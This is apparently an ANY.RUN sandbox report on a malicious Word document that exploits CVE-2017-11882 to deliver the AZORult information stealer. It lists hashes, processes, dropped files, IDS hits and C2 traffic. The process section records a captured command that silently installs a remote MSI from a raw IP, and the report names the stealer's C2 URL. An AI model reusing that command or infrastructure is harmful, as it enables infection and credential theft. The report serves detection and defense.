analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Bunker Requsition Nov 2018.doc

Full analysis: https://app.any.run/tasks/84aa8ba2-0137-4f96-a000-597c5b758e0a
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Malware Trends Tracker     >>>
Analysis date: November 14, 2018, 09:20:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
rat
azorult
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

C6F7F7A26D6D6B0A15902E1846ABAC8D

SHA1:

4AE01713F4596D67F1185C3F767C0F5B43089855

SHA256:

CC80949E976B515B4285A69866000442441B54A9EF56F75DB6DCF562277B0BA8

SSDEEP:

768:QmKfcZpEHUqUisx+NLBhoY52330zUUaxCbG8ibUBvlk4oYhCkt:Q4ZcUisxYtBmWHv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 384)

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 3272)

    • AZORULT was detected

      • MSI42E3.tmp (PID: 2600)

    • Connects to CnC server

      • MSI42E3.tmp (PID: 2600)

    • Actions looks like stealing of personal data

      • MSI42E3.tmp (PID: 2600)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2840)

    • Downloads executable files from IP

      • msiexec.exe (PID: 2840)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2840)
      • MSI42E3.tmp (PID: 2600)

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 384)
      • MSI42E3.tmp (PID: 2600)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2840)

    • Creates files in the user directory

      • MSI42E3.tmp (PID: 2600)

    • Reads the cookies of Google Chrome

      • MSI42E3.tmp (PID: 2600)

    • Reads the cookies of Mozilla Firefox

      • MSI42E3.tmp (PID: 2600)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3568)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2840)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3568)

    • Application was crashed

      • EQNEDT32.EXE (PID: 384)

    • Application was dropped or rewritten from another process

      • MSI42E3.tmp (PID: 2600)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 2840)

    • Loads dropped or rewritten executable

      • MSI42E3.tmp (PID: 2600)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
8
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe #AZORULT msi42e3.tmp cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3568"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Bunker Requsition Nov 2018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
384"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3272cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/6.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3876msiexec.exe /i http://34.244.180.39/6.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2840C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2600"C:\Windows\Installer\MSI42E3.tmp"C:\Windows\Installer\MSI42E3.tmp
msiexec.exe
User:
admin
Company:
Tencent Inc.
Integrity Level:
MEDIUM
Description:
Chartered Landscapes Ae Gilder Versions 8d
Exit code:
0
Version:
4.5.5.9
1832"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "MSI42E3.tmp"C:\Windows\system32\cmd.exeMSI42E3.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
408C:\Windows\system32\timeout.exe 3 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 481
Read events
767
Write events
0
Delete events
0

Modification events

No data
Executable files
50
Suspicious files
2
Text files
11
Unknown types
8

Dropped files

PID
Process
Filename
Type
3568WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3246.tmp.cvr
MD5:
SHA256:
2840msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF89E8A678953365F8.TMP
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:3D0E638F080CA3A2C3004BB4F2D8A7C3
SHA256:9FB2AA68BA07EA824079EFECC84B5FCB6426E652253DC927F17EAA02AF9B7D95
2840msiexec.exeC:\Windows\Installer\1841c8.ipibinary
MD5:6317130F59E0B4D27500F55E87313618
SHA256:C014C6CE4B27DEEE21926E685011D981310F9D43D193E2506B06DCE167A52C07
3568WINWORD.EXEC:\Users\admin\Desktop\~$nker Requsition Nov 2018.docpgc
MD5:81167E6AA30CDE6674A37BAD9167387B
SHA256:0802D518C72C0F52F188670260F9DD769869C54BFC0B8D6420F736F8483DB489
2840msiexec.exeC:\Windows\Installer\MSI42E3.tmpexecutable
MD5:CC16722F6EFDFD82B5E064991813326E
SHA256:8E2EF1F52924B49E18F3CAC42784D32AE520DE179ACD4315A31030B02C54EF40
2840msiexec.exeC:\Windows\Installer\MSI4235.tmpbinary
MD5:B095E2C751C0533EAFC6773AF728A918
SHA256:9C4EE9A7656208C27358E9D488CBBF3141AEA4D396F400E382B4BFE1878727B8
2840msiexec.exeC:\Windows\Installer\MSI3E5C.tmpexecutable
MD5:1256D7CB23A836621FF65EBA394A8E08
SHA256:96959B79935BF934721DE19C49B45E8313478B98EC40DC9618B66FAB5C284B94
2840msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:5BDB63C4F4E4FD784764B70F5A890322
SHA256:5D530EB54B9D4D8E27C4C9FCAE2CEB1487707E8B65358CFBD4BBEFCA75AB950E
3568WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:F284A25B3932D102B4F81D066E307A53
SHA256:2B62D53A9DFFA572EB877F3A902139333B6FA793D938A50399B17843ADDC8022
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2840
msiexec.exe
GET
200
34.244.180.39:80
http://34.244.180.39/6.msi
IE
executable
708 Kb
suspicious
2600
MSI42E3.tmp
POST
200
103.63.2.245:80
http://slimiyt.us/madteri/index.php
HK
binary
4.27 Mb
malicious
2600
MSI42E3.tmp
POST
200
103.63.2.245:80
http://slimiyt.us/madteri/index.php
HK
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2840
msiexec.exe
34.244.180.39:80
Amazon.com, Inc.
IE
suspicious
2600
MSI42E3.tmp
103.63.2.245:80
slimiyt.us
Guochao Group limited
HK
suspicious

DNS requests

Domain
IP
Reputation
slimiyt.us
  • 103.63.2.245
malicious

Threats

PID
Process
Class
Message
2840
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
2840
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
2840
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2840
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
2600
MSI42E3.tmp
A Network Trojan was detected
ET TROJAN AZORult Variant.4 Checkin M2
2600
MSI42E3.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult client request
2600
MSI42E3.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult HTTP Header
2600
MSI42E3.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult encrypted PE file
2600
MSI42E3.tmp
Generic Protocol Command Decode
SURICATA STREAM excessive retransmissions
2600
MSI42E3.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult HTTP Header
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Bunker Requsition Nov 2018.doc